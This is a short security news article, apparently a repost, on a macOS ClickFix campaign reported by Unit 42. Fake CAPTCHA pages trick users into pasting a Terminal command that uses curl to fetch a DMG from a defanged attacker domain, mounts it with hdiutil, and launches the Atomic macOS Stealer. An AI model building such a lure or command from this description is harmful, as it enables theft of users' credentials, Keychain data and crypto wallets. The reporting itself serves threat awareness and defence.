GoKawiilA new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS's native hdiutil utility, locates the application bundle it contains, and launches it automatically.
ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied "fix instructions." The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.
While ClickFix attacks involving DMGs are not new, previous campaigns typically relied on users manually opening downloaded DMG files to launch malicious applications or execute scripts from attacker-controlled servers.
The campaign spotted by Palo Alto combines both approaches by using a Terminal command to quietly download a DMG file and launch the malware it contains.
Malicious Terminal command used as fake Captcha verification
Source: Palo Alto Networks Unit42
After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet " -fsSL " flags and saves it to the /tmp folder under a random filename.
... continue reading